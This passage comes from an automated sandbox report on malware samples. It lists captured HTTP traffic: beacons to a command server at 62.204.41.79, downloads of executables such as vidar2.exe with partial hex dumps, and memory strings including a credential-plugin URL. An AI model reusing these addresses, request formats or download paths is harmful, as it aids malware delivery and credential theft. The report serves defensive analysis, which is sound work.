Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 13 Dec 2022 19:08:56 GMTContent-Type: application/octet-streamContent-Length: 249344Last-Modified: Tue, 13 Dec 2022 15:02:22 GMTConnection: keep-aliveETag: "639893fe-3ce00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b9 a5 58 48 fd c4 36 1b fd c4 36 1b fd c4 36 1b a6 ac 35 1a f7 c4 36 1b a6 ac 33 1a 61 c4 36 1b a6 ac 32 1a ef c4 36 1b 28 a9 32 1a ef c4 36 1b 28 a9 35 1a ef c4 36 1b 28 a9 33 1a d4 c4 36 1b a6 ac 37 1a f2 c4 36 1b fd c4 37 1b 5c c4 36 1b 66 aa 3f 1a fc c4 36 1b 66 aa c9 1b fc c4 36 1b 66 aa 34 1a fc c4 36 1b 52 69 63 68 fd c4 36 1b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 8a 8b 98 63 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e8 02 00 00 10 01 00 00 00 00 00 40 90 01 00 00 10 00 00 00 00 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 8f 03 00 a0 00 00 00 00 f0 03 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 50 29 00 00 80 5f 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 5f 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 e7 02 00 00 10 00 00 00 e8 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 9d 00 00 00 00 03 00 00 9e 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 44 00 00 00 a0 03 00 00 18 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 03 00 00 02 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 29 00 00 00 00 04 00 00 2a 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 13 Dec 2022 19:09:14 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Tue, 13 Dec 2022 14:34:04 GMTConnection: keep-aliveETag: "63988d5c-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 78 aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 90 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: global traffic HTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7598Host: login.live.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
Source: global traffic HTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4682Host: login.live.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iglyuyotce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csigrnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sigiagum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdpcbv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arfujedsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtalqe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bprujbtf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecaapsyol.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmhgchsawe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmwhbha.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhqusu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtkvayro.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aroxyrayv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufutmn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gomlgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqmkmifvh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okpnuoeb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prhgrykwf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umgkkbyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bljwplujsw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqdieq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrlpwddo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmsoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwsblto.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikihxohlb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdeypctxsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: r3oidsofsios.com
Source: global traffic HTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jenhfc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: r3oidsofsios.com
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU
Source: Joe Sandbox View ASN Name: LVLT-10753US LVLT-10753US
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.246.221.151 185.246.221.151
Source: Joe Sandbox View IP Address: 185.246.221.151 185.246.221.151
Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb
Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dll
Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIK
Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.php
Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1
Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1T)
Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1l&
Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1t&
Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpF
Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpM
Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpa
Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpcu
Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpg
Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpqu.
Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fb73jc3/index.phpwu$
Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://62.204.41.79/fbfb73jc3/index.php
Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmp String found in binary or memory: http://95.217.27.105:80
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://go.mail.ru/search
Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://nova.rambler.ru/search
Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 